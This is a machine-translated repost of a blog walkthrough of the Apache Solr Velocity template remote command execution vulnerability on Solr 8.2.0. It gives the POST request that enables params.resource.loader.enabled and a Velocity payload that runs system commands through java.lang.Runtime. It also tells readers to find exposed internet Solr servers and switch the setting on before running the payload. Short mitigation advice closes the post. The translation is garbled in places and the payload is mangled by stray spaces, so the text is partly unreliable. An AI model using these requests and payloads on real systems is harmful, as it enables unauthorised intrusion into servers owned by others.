Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an example analysis of remote command execution vulnerabilities injected into the Apache Solr Velocity template. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

Preface of 0x00

Today, I saw that someone in the group said that a RCE vulnerability about solr had been published on GitHub, so it immediately repeated a wave! Make sure that the poc is real and valid.

Introduction to solr:

Solr is an independent enterprise search application server that provides an API interface similar to Web-service. Users can submit a certain format of XML file to the search engine server through http request to generate an index, or they can make a search request through Http Get operation and get the return result in XML format.

0x01 vulnerability details

The cause of the vulnerability is:

Attackers can access solr admin pages directly and modify the configuration of nodes by constructing post requests.

Apache Solr integrates the VelocityResponseWriter plug-in by default. The option params.resource.loader.enabled in the plug-in's initialization parameters is used to control whether the parameter resource loader is allowed to specify templates in the Solr request parameters. The default setting is false.

When params.resource.loader.enabled is set to true, it will allow the user to specify the loading of related resources by setting parameters in the request, which means that an attacker can construct a malicious request and execute commands on the server, thus gaining permissions on the server.

Introduction to params.resource.loader.enabled:

Https://lucene.apache.org/solr/guide/6_6/velocity-response-writer.html

Chinese version:

Https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html

0x02 scope of influence:

Should affect solr5 (temporarily uncertain) to the latest version.

Build the 0x03 environment:

Environmental conditions:

Solr version: solr8.2.0

Operating system: windows

Build steps:

Download solr within the scope of the vulnerability. I use the latest version 8.2.0 here (solr startup requires the support of the java environment, so install java in advance)

Extract the downloaded solr, then go to the bin directory of solr, and execute the following command to start solr:

Solr start-p 8983

You can see that the display has been started:

Browser access verification:

Create a core that can be created on a web page or on the command line.

Here is a demonstration of creating on the command line:

You can see the successful creation.

For more information on web page creation core, please see:

Https://blog.csdn.net/weixin_39082031/article/details/78924909

Access to verify whether our core has been created successfully:

You can see that it has been successfully created!

Recurrence of 0x04 vulnerabilities:

Local recurrence:

Visit the solr site:

Get its core named test.

Access the config path of the core, view its configuration, and search for params.resource.loader.enabled parameters:

You can see that it is off by default.

We can turn on params.resource.loader.enabled by constructing POST packets

POST packet:

POST / solr/test/config HTTP/1.1 Host: 172.26.1.173 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en Qroom0.3 Content-Type: application/json Accept-Encoding: gzip, deflate Connection: close Content-Length: 259 {"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}

Example:

You can see the response package. It is said that it will be changed in the future (that is, our modified configuration will take effect later)

We revisit:

You can see that the request we constructed has successfully opened params.resource.loader.enabled.

Use payload on GitHub for command execution:

Select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set ($rt=$x.class.forName% 27% 27) +% 23set ($rt=$x.class.forName (% 27java.lang.Runtime%27)) +% 23set ($chr=$x.class.forName (% 27java.lang.Character%27)) +% 23set ($str=$x.class.forName (% 27java.lang.String%27)) +% 23set ($ex=$rt.getRuntime (). Exec (% 27id%27)) + $ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($iInn + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

Our target machine is windows, so change id to windows command:

Internet sites:

Find a target:

Get the node name of the solr:

Enter the config of the node:

Ctrl + f search params.resource.loader.enabled if the corresponding value of this parameter is true, the vulnerability exists!

If the corresponding value is false, you can change it to true by sending a post packet!

POST packet:

Node name obtained by POST / solr/ / config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 {"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}

When this parameter is true, use poc on GitHub directly:

Select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set ($rt=$x.class.forName% 27% 27) +% 23set ($rt=$x.class.forName (% 27java.lang.Runtime%27)) +% 23set ($chr=$x.class.forName (% 27java.lang.Character%27)) +% 23set ($str=$x.class.forName (% 27java.lang.String%27)) +% 23set ($ex=$rt.getRuntime (). Exec (% 27id%27)) + $ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($iInn + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end

Direct get request:

0x04 vulnerability fix:

1. The official has not yet released the relevant patch for this vulnerability. It is recommended that users set the solr backend for login authentication!

Restrict Internet users' access to solr admin!

2. Delete the configuration of params.resource.loader.enabled.

3. Keep an eye on the solr official, and update the new version as soon as possible.

The above is an example of injecting remote command execution vulnerabilities into the Apache Solr Velocity template shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.